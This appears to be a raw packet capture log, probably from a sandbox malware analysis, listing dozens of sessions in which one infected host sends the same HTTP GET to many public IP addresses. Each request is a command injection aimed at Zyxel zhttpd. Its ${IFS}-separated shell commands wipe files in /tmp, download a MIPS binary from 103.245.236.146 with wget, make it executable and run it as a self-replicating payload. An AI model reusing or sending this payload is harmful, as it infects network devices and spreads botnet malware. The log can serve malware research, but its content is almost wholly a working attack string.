                                                        Jan 28, 2024 10:12:50.357655048 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3716192.168.2.144553899.201.116.213443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:50.357696056 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3717192.168.2.143786672.202.124.39443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:50.357707024 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3718192.168.2.1440622138.147.248.77443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:50.357758045 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3719192.168.2.145231259.220.83.138443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:50.357796907 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3720192.168.2.1454980187.238.21.216443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:50.357831955 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3721192.168.2.1456106166.163.249.160443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:50.357911110 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3722192.168.2.1442816136.152.59.244443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:50.357909918 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3723192.168.2.1448484101.239.188.57443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:50.357913017 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3724192.168.2.144815631.93.3.233443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:50.357923031 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3725192.168.2.1432820198.92.149.107443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:50.357954025 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3726192.168.2.145406642.22.64.70443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:50.358022928 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3727192.168.2.1443280124.123.178.25443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:50.358069897 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3728192.168.2.145305062.160.227.55443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:50.358076096 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3729192.168.2.1450530113.165.222.17443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:50.358103037 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3730192.168.2.145397631.20.45.102443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:50.358128071 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3731192.168.2.145325650.43.209.99443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:50.358179092 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3732192.168.2.1455766180.201.19.249443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:50.358226061 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3733192.168.2.1454542106.191.173.90443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:50.358259916 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3734192.168.2.1446038145.19.111.2443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:50.358304024 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3735192.168.2.144367843.222.42.255443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:50.358350992 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3736192.168.2.144050885.112.41.111443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:50.358385086 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3737192.168.2.1437502205.105.64.100443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:50.358412981 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3738192.168.2.146010631.221.18.186443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:50.358443975 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3739192.168.2.144468214.115.248.25443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:50.358498096 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3740192.168.2.1451702147.72.100.109443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:50.358525991 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3741192.168.2.144399469.45.173.85443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:50.358576059 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3742192.168.2.1449308208.199.104.50443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:50.358628988 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3743192.168.2.145624853.22.95.255443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:50.358638048 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3744192.168.2.143885885.58.50.208443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:50.358684063 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3745192.168.2.144306279.32.92.171443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:50.358726025 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3746192.168.2.14370642.201.29.207443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:50.358757973 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3747192.168.2.143751832.94.116.41443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:50.358792067 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3748192.168.2.1457622175.5.92.195443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:50.358825922 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3749192.168.2.1451308143.27.35.172443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:50.358863115 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3750192.168.2.1437966204.119.175.225443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:50.358889103 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3751192.168.2.1437766168.224.1.20443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:50.358946085 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3752192.168.2.1450240112.214.16.96443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:50.358971119 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3753192.168.2.1434922168.102.151.61443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:50.359024048 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3754192.168.2.1436406131.18.163.233443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:50.359054089 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3755192.168.2.145048253.80.217.163443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:50.359080076 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3756192.168.2.144471037.102.157.1443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:50.359118938 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3757192.168.2.1439006201.140.183.200443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:50.359165907 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3758192.168.2.143329020.148.54.82443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:50.359195948 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3759192.168.2.144970493.162.139.130443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:50.359240055 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3760192.168.2.143915227.254.121.187443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:50.359267950 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3761192.168.2.144153879.72.216.168443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:50.359304905 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3762192.168.2.1434814179.7.94.189443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:50.359329939 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3763192.168.2.1433362201.241.13.84443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:50.359369993 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3764192.168.2.1444452121.186.58.71443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:50.359416008 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3765192.168.2.1447432192.200.78.189443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:50.359452963 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3766192.168.2.143509617.19.238.222443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:50.359499931 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3767192.168.2.144398251.149.177.135443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:50.359512091 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3768192.168.2.1457616165.9.127.238443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:50.359556913 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3769192.168.2.145470866.124.180.117443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:50.359602928 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3770192.168.2.1445942163.190.135.160443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:50.359642029 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3771192.168.2.1445206163.12.54.230443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:50.359662056 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3772192.168.2.1441096152.171.148.175443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:50.359711885 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3773192.168.2.1459444190.240.36.32443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:50.359749079 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3774192.168.2.144144294.123.131.214443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:50.359795094 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3775192.168.2.143607859.39.138.160443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:50.359833002 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3776192.168.2.145958814.38.9.101443
                                                        TimestampBytes transferredDirectionData
